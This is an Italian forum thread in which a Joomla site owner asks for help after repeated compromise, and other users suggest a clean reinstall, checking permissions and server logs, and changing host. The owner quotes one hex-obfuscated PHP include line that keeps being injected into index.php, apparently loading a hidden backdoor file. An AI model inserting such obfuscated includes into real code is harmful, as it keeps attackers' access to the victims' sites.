Consenso all'uso dei cookies

SITO1 -- SITO2 -- Forum1 -- CercaGlobale -- Informativa su Cookie e Privacy

Valutazione discussione:
  • 0 voto(i) - 0 media
  • 1
  • 2
  • 3
  • 4
  • 5
problema sito internet hackerato
I problemi col mio sito internet realizzato con joomla sono iniziati nel mese di ottobre, quando il mio dominio è finito in una blacklist perché da esso risultavano essere spedite delle mail di spam.

Ho eliminato dei file contenenti codice malevolo e ho chiesto di essere rimosso dalla blacklist.

Credevo di aver risolto il problema, quando ai primi di dicembre mi sono accorto che digitando l'indirizzo del mio sito compariva una pagina bianca e che mi era impossibile accedere al pannello di amministrazione.

Purtroppo (mea culpa) non avevo un backup.

Ho salvato la situazione esportando il database e reinstallando joomla, provvedendo ovviamente a modificare le password dell'account ftp, del database e dell'amministratore del sito.

Ho anche eliminato dei file php che palesemente contenevano codice malevolo.

Il sito apparentemente sembra funzionare bene, tuttavia mi sono accorto che ogni giorno il file index.php viene  quotidianamente modificato inserendo questa riga di codice:

include "\x2fvar\x2fwww\x2fvir\x74ual\x2fbbd\x6frga\x6ci.e\x75/ht\x64ocs\x2fmod\x75les\x2fmod\x5fart\x69cle\x73_ne\x77s/t\x6dpl/\x61lia\x73.ph\x70";

Io cancello la riga, ma dopo qualche ora essa riappare.
C'è quindi qualcuno che ha le chiavi per entrare nel sito oppure qualche codice malevolo, inserito chissà dove, che potrebbe crearmi ancora problemi.

Cosa posso fare?

Ringrazio anticipatamente.
Cita messaggio
Grazie da:
Il mio consiglio è di reinstallare Joomla da zero utilizzando la versione più recente e di NON installare temi e plug-in.

Questa configurazione insieme ai corretti settaggi dei permessi sul server è la più sicura.

Se invece vuoi capire come il tuo sito è stato hackerato devi leggere i log del server ed i file php della piattaforma. Un lavoro che di solito conviene affidare ad un esperto.
Cita messaggio
Grazie da:
Al suggerimento sopra aggiungo che forse ti conviene cambiare fornitore del servizio di hosting (a meno che tu sia sicuro che è un gestore affidabile e che cura la sicurezza dei propri server)
Il mio blog: ZEROZEROCENT.BLOGSPOT.COM
LEGGE DI MURPHY: SE QUALCOSA PUO' ANDAR MALE, LO FARA'
VERSIONE QUANTISTICA DELLA LEGGE DI MURPHY: TUTTO VA MALE CONTEMPORANEAMENTE
Cita messaggio
Grazie da:
Vi ringrazio per le risposte.
Cita messaggio
Grazie da:

Vai al forum:

Utenti che stanno guardando questa discussione: 1 Ospite(i)